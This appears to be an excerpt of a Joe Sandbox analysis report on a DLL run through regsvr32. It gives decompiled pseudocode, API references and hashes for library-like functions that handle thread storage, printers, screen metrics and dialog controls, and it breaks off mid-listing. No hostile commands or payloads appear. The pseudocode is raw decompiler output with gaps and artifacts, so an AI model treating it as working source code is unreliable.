Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_slstrlen
String ID:
API String ID: 2480106619-0
Opcode ID: 2c21d6362cad45aea85f72fad5bbb6bd7cefb67d004cf1cca69a6cfb6f24c2f2
Instruction ID: beec38f402ab7a9feddd90cb9c5ff18bc8e3595b27d7b4fa6925a77486f7bcf5
Opcode Fuzzy Hash: 2c21d6362cad45aea85f72fad5bbb6bd7cefb67d004cf1cca69a6cfb6f24c2f2
Instruction Fuzzy Hash: AEA18D75C0821BDBCF01CFA8CA84AEDBBB1BF09314F24C159E514B7290D7759AA1CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A3BB Relevance: 12.1, APIs: 8, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6DA4A3BB(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E6DA5C840(E6DA6E713, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E6DA4A03B(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x6da7365c;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E6DA4A16D( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E6DA449D1(0, _t51, _t62, _t65, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E6DA449D1(0, _t51, _t62, _t65, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E6DA44860(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E6DA5C5A0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E6DA5C8E5(_t36);
			}

0x6da4a3bb
0x6da4a3c2
0x6da4a3c7
0x6da4a3c9
0x6da4a3cc
0x6da4a3d0
0x6da4a3d3
0x6da4a3d9
0x6da4a3e0
0x6da4a4e1
0x6da4a3ef
0x6da4a3f7
0x6da4a3fb
0x6da4a42f
0x6da4a432
0x6da4a437
0x6da4a439
0x6da4a445
0x6da4a445
0x6da4a43b
0x6da4a43b
0x6da4a441
0x6da4a441
0x6da4a447
0x6da4a44c
0x6da4a44f
0x6da4a452
0x6da4a455
0x00000000
0x6da4a3fd
0x6da4a3fd
0x6da4a403
0x6da4a412
0x6da4a412
0x6da4a415
0x6da4a479
0x6da4a47f
0x6da4a484
0x6da4a417
0x6da4a41c
0x6da4a422
0x6da4a425
0x6da4a425
0x6da4a48c
0x6da4a491
0x6da4a497
0x6da4a497
0x6da4a49f
0x6da4a4b0
0x6da4a4bc
0x6da4a4c1
0x6da4a4c7
0x6da4a4c7
0x6da4a403
0x6da4a4ca
0x6da4a4cf
0x6da4a4d9
0x6da4a4d9
0x6da4a4dc
0x6da4a4dc
0x6da4a4e2
0x6da4a4ed

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA4A3C2
EnterCriticalSection.KERNEL32(00000000,00000010,6DA4A570,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000,?), ref: 6DA4A3D3
TlsGetValue.KERNEL32 ref: 6DA4A3F1
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030), ref: 6DA4A425
LeaveCriticalSection.KERNEL32(6DA22C88,?,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000), ref: 6DA4A491
TlsSetValue.KERNEL32(?,00000000,00000030,00000000), ref: 6DA4A4C1
LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000,?), ref: 6DA4A4E2

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal
String ID:
API String ID: 2819805515-0
Opcode ID: 728cb391e6e054628a9854edcad31b5f1e80d1b0cf5eb733937e91fcbc2e67cd
Instruction ID: 31a4540e942ff1f411a469a08fc59f8599126bfee57bb150c385986dc61df66f
Opcode Fuzzy Hash: 728cb391e6e054628a9854edcad31b5f1e80d1b0cf5eb733937e91fcbc2e67cd
Instruction Fuzzy Hash: 9431DE7540C706EFDB109F20C888D5EBBB2FF05318B21C139E65A96550CB71AD91CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6DA46111 Relevance: 12.1, APIs: 8, Instructions: 66
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6DA46111(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E6DA49CE4(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E6DA49CE4( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x6da46116
0x6da46118
0x6da4611a
0x6da46122
0x6da4613c
0x6da46144
0x6da4614e
0x6da46155
0x6da46157
0x6da4615c
0x6da4615f
0x6da4615f
0x6da46176
0x6da4617d
0x6da46195
0x6da4619a
0x6da4619f
0x6da4619f
0x6da461a5
0x6da461a5
0x6da46155
0x6da461aa
0x6da461ae

APIs

GlobalLock.KERNEL32 ref: 6DA46130
lstrcmpA.KERNEL32(?,?,?,?,?,?,?,6DA41A98,?), ref: 6DA4613C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,6DA41A98,?), ref: 6DA4614E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,6DA41A98,?), ref: 6DA4616E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 6DA46176
GlobalLock.KERNEL32 ref: 6DA46180
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,6DA41A98,?), ref: 6DA4618D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,6DA41A98,?), ref: 6DA461A5

Part of subcall function 6DA49CE4: GlobalFlags.KERNEL32(?), ref: 6DA49CF3
Part of subcall function 6DA49CE4: GlobalUnlock.KERNEL32(?,?,?,?,6DA4689C,?,00000214,6DA25F1F,?,?,6DA25EEF), ref: 6DA49D05
Part of subcall function 6DA49CE4: GlobalFree.KERNEL32(?), ref: 6DA49D10

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: e9eab2efdfd6e20ceae8f6aa3448524c7c24d0de63e893666c50f10112b80328
Instruction ID: d90d951209cc3d289921fa47b0de8aa2ed11567f6382a07ab87623b3bf2e4d2e
Opcode Fuzzy Hash: e9eab2efdfd6e20ceae8f6aa3448524c7c24d0de63e893666c50f10112b80328
Instruction Fuzzy Hash: 4011BC76508604BFDF124B6ACE48DBB7ABDFBC6744B188019F711C2120C732C981D760

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49ED1 Relevance: 12.0, APIs: 8, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA49ED1(void* __ecx) {
				struct HDC__* _t15;
				void* _t17;

				_t17 = __ecx;
				 *((intOrPtr*)(_t17 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
				 *0x6da85ad8 = GetSystemMetrics(2) + 1;
				 *0x6da85adc = GetSystemMetrics(3) + 1;
				_t15 = GetDC(0);
				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
				return ReleaseDC(0, _t15);
			}

0x6da49ede
0x6da49ee4
0x6da49eeb
0x6da49ef3
0x6da49efd
0x6da49f0e
0x6da49f18
0x6da49f20
0x6da49f2c

APIs

GetSystemMetrics.USER32 ref: 6DA49EE0
GetSystemMetrics.USER32 ref: 6DA49EE7
GetSystemMetrics.USER32 ref: 6DA49EEE
GetSystemMetrics.USER32 ref: 6DA49EF8
GetDC.USER32(00000000), ref: 6DA49F02
GetDeviceCaps.GDI32(00000000,00000058), ref: 6DA49F13
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6DA49F1B
ReleaseDC.USER32(00000000,00000000), ref: 6DA49F23

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 3c92c8a9a19db7231991d79542543a9e199c9d3d5a1460216fd87fbd3c801aee
Instruction ID: d92e7457532463b971d2660ccf39f693d1be451d9272b8a0e2080c28c663daee
Opcode Fuzzy Hash: 3c92c8a9a19db7231991d79542543a9e199c9d3d5a1460216fd87fbd3c801aee
Instruction Fuzzy Hash: BDF062B1E447246BEB105B728C8DB267F78EB46761F108416E7059B1C0D7B598028FD0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA48B06 Relevance: 10.7, APIs: 7, Instructions: 242
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E6DA48B06(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t136;
				int _t141;
				signed short _t144;
				short* _t145;
				intOrPtr _t149;
				signed short _t173;
				intOrPtr _t174;
				signed int _t175;
				intOrPtr _t180;
				struct tagRECT _t186;
				int _t187;
				signed short _t189;
				signed short _t190;
				void* _t191;
				void* _t217;
				intOrPtr _t221;
				short _t222;
				intOrPtr _t223;
				intOrPtr* _t230;
				signed short* _t232;
				signed int _t235;
				signed short* _t236;
				signed short* _t238;
				signed short* _t239;
				void* _t240;

				_push(0x9c);
				E6DA5C876(E6DA6E5E0, __ebx, __edi, __esi);
				_t230 =  *((intOrPtr*)(_t240 + 0x14));
				_t232 =  *(_t240 + 0x1c);
				 *((intOrPtr*)(_t240 - 0x3c)) =  *((intOrPtr*)(_t240 + 8));
				 *(_t240 - 0x50) =  *(_t240 + 0xc);
				 *((intOrPtr*)(_t240 - 0x44)) =  *((intOrPtr*)(_t240 + 0x24));
				_t136 = _t230 + 0x12;
				 *((intOrPtr*)(_t240 - 0x2c)) = _t136;
				if( *((intOrPtr*)(_t240 + 0x10)) != 0) {
					 *((intOrPtr*)(_t240 - 0x6c)) =  *((intOrPtr*)(_t230 + 8));
					 *((intOrPtr*)(_t240 - 0x68)) =  *((intOrPtr*)(_t230 + 4));
					 *((short*)(_t240 - 0x64)) =  *((intOrPtr*)(_t230 + 0xc));
					 *((short*)(_t240 - 0x62)) =  *((intOrPtr*)(_t230 + 0xe));
					 *((short*)(_t240 - 0x5e)) =  *_t136;
					_t221 = _t230 + 0x18;
					 *((short*)(_t240 - 0x60)) =  *(_t230 + 0x10);
					 *((short*)(_t240 - 0x5c)) =  *((intOrPtr*)(_t230 + 0x14));
					_t230 = _t240 - 0x6c;
					 *((intOrPtr*)(_t240 - 0x2c)) = _t221;
				}
				_t222 =  *((short*)(_t230 + 0xa));
				_t186 =  *((short*)(_t230 + 8));
				 *((intOrPtr*)(_t240 - 0x70)) =  *((short*)(_t230 + 0xe)) + _t222;
				 *(_t240 - 0x7c) = _t186;
				 *((intOrPtr*)(_t240 - 0x78)) = _t222;
				 *((intOrPtr*)(_t240 - 0x74)) =  *((short*)(_t230 + 0xc)) + _t186;
				_t141 = MapDialogRect( *( *((intOrPtr*)(_t240 - 0x3c)) + 0x20), _t240 - 0x7c);
				 *(_t240 - 0x34) =  *(_t240 - 0x34) & 0x00000000;
				if( *((intOrPtr*)(_t240 + 0x20)) >= 4) {
					_t190 =  *_t232;
					 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - 4;
					_t232 =  &(_t232[2]);
					if(_t190 > 0) {
						__imp__#4(_t232, _t190);
						_t191 = _t190 + _t190;
						_t232 = _t232 + _t191;
						 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - _t191;
						 *(_t240 - 0x34) = _t141;
					}
				}
				 *(_t240 - 0x38) =  *(_t240 - 0x38) & 0x00000000;
				E6DA212E0(_t240 - 0x30);
				 *((intOrPtr*)(_t240 - 4)) = 0;
				 *(_t240 - 0x4c) = 0;
				 *(_t240 - 0x48) = 0;
				 *(_t240 - 0x40) = 0;
				if( *((intOrPtr*)(_t240 + 0x18)) == 0x37a ||  *((intOrPtr*)(_t240 + 0x18)) == 0x37b) {
					_t144 =  *_t232;
					_t55 = _t144 - 0xc; // 0x36f
					_t223 = _t55;
					_t232 =  &(_t232[6]);
					 *(_t240 - 0x58) = _t144;
					 *((intOrPtr*)(_t240 - 0x28)) = _t223;
					if(_t223 <= 0) {
						L16:
						 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)(_t240 + 0x20)) - _t144;
						 *((intOrPtr*)(_t240 + 0x18)) =  *((intOrPtr*)(_t240 + 0x18)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t173 =  *_t232;
						 *((intOrPtr*)(_t240 - 0x28)) =  *((intOrPtr*)(_t240 - 0x28)) - 6;
						_t236 =  &(_t232[2]);
						_t189 =  *_t236 & 0x0000ffff;
						_t232 =  &(_t236[1]);
						 *(_t240 - 0x54) = _t173;
						if(_t173 != 0x80010001) {
							_t174 = E6DA3D6AF(__eflags, 0x1c);
							 *((intOrPtr*)(_t240 - 0x80)) = _t174;
							 *((char*)(_t240 - 4)) = 1;
							__eflags = _t174;
							if(_t174 == 0) {
								_t175 = 0;
								__eflags = 0;
							} else {
								_t175 = E6DA4FF07(_t174,  *(_t240 - 0x38),  *(_t240 - 0x54), _t189);
							}
							 *((char*)(_t240 - 4)) = 0;
							 *(_t240 - 0x38) = _t175;
						} else {
							_t238 =  &(_t232[2]);
							 *(_t240 - 0x48) =  *_t232;
							_t239 =  &(_t238[6]);
							 *(_t240 - 0x40) =  *_t238;
							E6DA214C0(_t240 - 0x30, _t239);
							_t180 =  *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x30)) - 0xc));
							_t217 = 0xffffffef;
							 *((intOrPtr*)(_t240 - 0x28)) =  *((intOrPtr*)(_t240 - 0x28)) + _t217 - _t180;
							_t232 = _t239 + _t180 + 1;
							 *(_t240 - 0x4c) = _t189 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t240 - 0x28)) > 0);
					_t144 =  *(_t240 - 0x58);
					goto L16;
				} else {
					L17:
					_t145 =  *((intOrPtr*)(_t240 - 0x2c));
					_t253 =  *_t145 - 0x7b;
					_push(_t240 - 0x20);
					_push(_t145);
					if( *_t145 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t187 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t240 + 0x20)));
					_push(_t232);
					 *((intOrPtr*)(_t240 - 0x2c)) = _t145;
					E6DA55B86(0, _t240 - 0xa8, _t230, _t232, _t253);
					asm("sbb esi, esi");
					_t235 =  ~( *((intOrPtr*)(_t240 + 0x18)) - 0x00000378 & 0x0000ffff) & _t240 - 0x000000a8;
					_t254 =  *((intOrPtr*)(_t240 - 0x2c));
					 *((char*)(_t240 - 4)) = 2;
					 *((intOrPtr*)(_t240 - 0x24)) = 0;
					if( *((intOrPtr*)(_t240 - 0x2c)) >= 0) {
						_push(1);
						if(E6DA4DCE8(0,  *((intOrPtr*)(_t240 - 0x3c)), _t230, _t235, _t254) != 0 && E6DA4E28D( *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x3c)) + 0x4c)), 0, _t240 - 0x20, 0,  *_t230, _t240 - 0x7c,  *(_t230 + 0x10) & 0x0000ffff, _t235, 0 |  *((intOrPtr*)(_t240 + 0x18)) == 0x00000377,  *(_t240 - 0x34), _t240 - 0x24) != 0) {
							E6DA4F45D( *((intOrPtr*)(_t240 - 0x24)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t240 - 0x24)) + 0x24),  *(_t240 - 0x50), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0x94) =  *(_t240 - 0x38);
							E6DA23100(0,  *((intOrPtr*)(_t240 - 0x24)) + 0xa4, _t230, _t235,  *((intOrPtr*)(_t240 - 0x24)) + 0xa4, _t240 - 0x30);
							 *((short*)( *((intOrPtr*)(_t240 - 0x24)) + 0x98)) =  *(_t240 - 0x4c);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0x9c) =  *(_t240 - 0x48);
							 *( *((intOrPtr*)(_t240 - 0x24)) + 0xa0) =  *(_t240 - 0x40);
						}
					}
					if( *(_t240 - 0x34) != _t187) {
						__imp__#6( *(_t240 - 0x34));
					}
					_t149 =  *((intOrPtr*)(_t240 - 0x24));
					if(_t149 == _t187) {
						 *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x44)))) = _t187;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t240 - 0x44)))) =  *((intOrPtr*)(_t149 + 0x24));
						_t187 = 1;
					}
					 *((char*)(_t240 - 4)) = 0;
					E6DA55EF4(_t187, _t240 - 0xa8, _t230, _t235, 1);
					E6DA21430( *((intOrPtr*)(_t240 - 0x30)) + 0xfffffff0);
					return E6DA5C8F9(_t187, _t230, _t235);
				}
			}

0x6da48b06
0x6da48b10
0x6da48b1c
0x6da48b1f
0x6da48b22
0x6da48b28
0x6da48b2e
0x6da48b31
0x6da48b34
0x6da48b37
0x6da48b3f
0x6da48b45
0x6da48b4c
0x6da48b56
0x6da48b5e
0x6da48b66
0x6da48b69
0x6da48b6d
0x6da48b71
0x6da48b74
0x6da48b74
0x6da48b77
0x6da48b7f
0x6da48b89
0x6da48b98
0x6da48b9b
0x6da48b9e
0x6da48ba1
0x6da48ba7
0x6da48baf
0x6da48bb1
0x6da48bb3
0x6da48bb7
0x6da48bbc
0x6da48bc0
0x6da48bc6
0x6da48bc8
0x6da48bca
0x6da48bcd
0x6da48bcd
0x6da48bbc
0x6da48bd0
0x6da48bd7
0x6da48be3
0x6da48be6
0x6da48be9
0x6da48bec
0x6da48bf3
0x6da48c00
0x6da48c02
0x6da48c02
0x6da48c05
0x6da48c08
0x6da48c0b
0x6da48c10
0x6da48c96
0x6da48c96
0x6da48c99
0x00000000
0x00000000
0x00000000
0x00000000
0x6da48c16
0x6da48c16
0x6da48c16
0x6da48c18
0x6da48c1c
0x6da48c1f
0x6da48c23
0x6da48c24
0x6da48c2c
0x6da48c63
0x6da48c69
0x6da48c6c
0x6da48c70
0x6da48c72
0x6da48c84
0x6da48c84
0x6da48c74
0x6da48c7d
0x6da48c7d
0x6da48c86
0x6da48c8a
0x6da48c2e
0x6da48c30
0x6da48c33
0x6da48c38
0x6da48c3f
0x6da48c42
0x6da48c4a
0x6da48c4f
0x6da48c52
0x6da48c55
0x6da48c5c
0x6da48c5c
0x6da48c8d
0x6da48c93
0x00000000
0x6da48ca0
0x6da48ca0
0x6da48ca0
0x6da48ca3
0x6da48caa
0x6da48cab
0x6da48cac
0x6da48cb6
0x6da48cae
0x6da48cae
0x6da48cae
0x6da48cbc
0x6da48cbe
0x6da48cbf
0x6da48cc8
0x6da48cc9
0x6da48ccc
0x6da48ce2
0x6da48cea
0x6da48cec
0x6da48cef
0x6da48cf3
0x6da48cf6
0x6da48cff
0x6da48d08
0x6da48d4a
0x6da48d5e
0x6da48d6a
0x6da48d7d
0x6da48d89
0x6da48d96
0x6da48da2
0x6da48da2
0x6da48d08
0x6da48dab
0x6da48db0
0x6da48db0
0x6da48db6
0x6da48dbb
0x6da48def
0x6da48dbd
0x6da48dc5
0x6da48dc7
0x6da48dc7
0x6da48dce
0x6da48dd2
0x6da48ddd
0x6da48de9
0x6da48de9

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA48B10
MapDialogRect.USER32(?,?), ref: 6DA48BA1
SysAllocStringLen.OLEAUT32(?,?), ref: 6DA48BC0
CLSIDFromString.OLE32(?,00000004), ref: 6DA48CAE

Part of subcall function 6DA3D6AF: _malloc.LIBCMT ref: 6DA3D6CD

CLSIDFromProgID.OLE32(?,00000004), ref: 6DA48CB6
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 6DA48D5E
SysFreeString.OLEAUT32(00000000), ref: 6DA48DB0

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prolog3_ProgRectWindow_malloc
String ID:
API String ID: 2980224915-0
Opcode ID: c35d1620461ce2941006493f35fbb646ad06a3249aa4bb7c1eb1ed0cc9c32347
Instruction ID: ccbff84b645e974db3013c006d97b11e50942396abcf837ef5777dc58ee3fd3d
Opcode Fuzzy Hash: c35d1620461ce2941006493f35fbb646ad06a3249aa4bb7c1eb1ed0cc9c32347
Instruction Fuzzy Hash: DDA138B5D08219DFDF04CFA8D984AEDBBF4FF08304F15812AE919A7250E775A980CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4D2E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DA4D2E2(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				signed int _t54;
				void* _t65;
				char* _t69;
				short* _t70;
				signed int _t72;
				signed int* _t83;
				short* _t84;
				void* _t93;
				signed int* _t101;
				signed int _t102;
				void** _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int _t109;
				void* _t110;

				_t104 = __esi;
				_t99 = __edx;
				_t82 = __ebx;
				_t54 =  *0x6da82744; // 0x616b45bb
				_v8 = _t54 ^ _t109;
				_t103 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E6DA4D116(_t83);
					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t105;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t65 = 0;
					} else {
						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t69;
						if(_t69 < _t105) {
							goto L15;
						} else {
							_t70 = E6DA4D15D(_t83);
							_t93 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t93 = _t105 + 2 + E6DA5CCF8(_t84 + _t105) * 2;
							}
							_t33 =  &(_v76[3]); // 0x3
							_t101 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t93 + _t36 & 0xfffffffc;
							_t107 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t102 =  *(_t101 + 8) & 0x0000ffff;
							} else {
								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t93 || _t102 <= 0) {
								L17:
								 *_t84 = _a8;
								_t99 =  &_v72;
								E6DA4B44A(_t84 + _v92, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t103[1] = _t103[1] + _t107 - _v80;
								GlobalUnlock( *_t103);
								_t103[2] = _t103[2] & 0x00000000;
								_t65 = 1;
							} else {
								_t99 = _t103[1];
								_t97 = _t99 - _t72 + _v84;
								if(_t99 - _t72 + _v84 <= _t99) {
									E6DA4B44A(_t84, _t107, _t97, _t72, _t97);
									_t110 = _t110 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t104);
					_pop(_t82);
				} else {
					_t65 = 0;
				}
				return E6DA59DE2(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
			}

0x6da4d2e2
0x6da4d2e2
0x6da4d2e2
0x6da4d2ea
0x6da4d2f1
0x6da4d2f8
0x6da4d2fe
0x6da4d301
0x6da4d30a
0x6da4d30b
0x6da4d314
0x6da4d325
0x6da4d328
0x6da4d330
